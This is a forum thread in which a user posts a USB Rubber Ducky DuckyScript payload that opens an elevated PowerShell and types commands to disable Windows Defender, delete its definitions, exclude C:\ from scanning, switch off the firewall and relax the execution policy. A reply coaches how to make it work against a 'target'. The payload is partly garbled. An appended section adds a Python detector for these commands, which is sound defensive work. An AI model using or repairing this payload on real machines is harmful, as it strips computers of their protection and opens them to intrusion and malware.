
Payload doesn't inject


Hi,

I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing.

I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green.

I'm using Windows 11.

What am I doing wrong?

Thanks for any help


14 hours ago, dark_pyrro said:

What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.

Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky.

However I haven't been able to disable Windows Defender. The script I used is as follows:

-------------------------------------------

DELAY 3000

GUI x
DELAY 500
STRINGLN a
DELAY 1000

ATTACKMODE HID
DELAY 500

REM STAGE 2  Stop Windows Defender Anti Virus********
REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}"
DELAY 1000
STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";
DELAY 1000
STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\";
DELAY 500
STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true;
DELAY 1000
STRINGLN netsh advfirewall set allprofiles state off  
DELAY 1000
STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
DELAY 1000
SHIFT y
DELAY 500
ENTER;

-----------------------------------------------------

However Windows Defender is still running. Any ideas?


8 hours ago, Rusty_83 said:

DELAY 3000

Not really important in terms of getting the payload in general to work, but instead of using the initial delay, you could use the PASSIVE_WINDOWS_DETECT extension since the target is Windows based.

8 hours ago, Rusty_83 said:

GUI x
DELAY 500
STRINGLN a
DELAY 1000

Something's missing in this code block. Usually, you need to confirm the elevated terminal/console, but I can't see that here (i.e. "Yes" has to be pressed to get to the elevated prompt). A longer delay is perhaps also needed, but it depends on the performance of the target and how fast it can open the PowerShell window.

9 hours ago, Rusty_83 said:

ATTACKMODE HID
DELAY 500

This shouldn't be necessary since the default ATTACKMODE for the Ducky is ATTACKMODE HID. And, if it wasn't, it still had to be moved to the top of the payload since keystrokes are entered before ATTACKMODE HID is introduced in the payload code.

9 hours ago, Rusty_83 said:

STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true";

Try running this line manually exactly the way it looks. What is the result? It will cd into the directory, but then just echo the rest of the commands. Remove the quote marks around the commands and try it again. Any difference?

A general tip is that if something isn't working, try running it manually and see what the results are. It will help a lot when troubleshooting.
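
Seen from the defender's side, the commands in the payload quoted above leave recognizable text in command-line and PowerShell logs. The following is an added example, not written by anyone in this thread: it matches those commands with regular expressions over constructed sample lines, and the rule names and input format are assumptions made for illustration.

```python
import re

# Patterns for the Defender/firewall tampering commands that appear in the
# payload quoted in this thread. Rule names are made up for this example.
RULES = {
    "defender-protection-disabled": re.compile(
        r"set-mppreference\b.*?-disable\w+\s+(?:\$true|1)\b", re.I),
    "defender-definitions-removed": re.compile(
        r"mpcmdrun(?:\.exe)?\b.*?-removedefinitions\b", re.I),
    "defender-exclusion-added": re.compile(
        r"add-mppreference\b.*?-exclusionpath\b", re.I),
    "firewall-disabled": re.compile(
        r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off\b", re.I),
    "execution-policy-relaxed": re.compile(
        r"set-executionpolicy\b.*?\b(?:unrestricted|bypass)\b", re.I),
}

def find_tampering(lines):
    """Return (line_number, rule_name) for every rule that matches a line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, name))
    return hits

# Constructed sample of logged command text (not real telemetry).
# Lines 1, 3 and 6 are benign look-alikes that must not be flagged.
SAMPLE_LOG = [
    "Get-MpPreference | Select-Object DisableRealtimeMonitoring",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "set-mppreference -disablerealtimemonitoring $false",
    '& "C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    "Add-MpPreference -ExclusionPath C:\\",
    "netsh advfirewall show allprofiles",
    "netsh advfirewall set allprofiles state off",
    "Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false",
]

if __name__ == "__main__":
    for number, name in find_tampering(SAMPLE_LOG):
        print(f"line {number}: {name}: {SAMPLE_LOG[number - 1]}")
```

In practice the input would be command text taken from process-creation logging or PowerShell script block logging (event ID 4104) rather than a hard-coded list.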

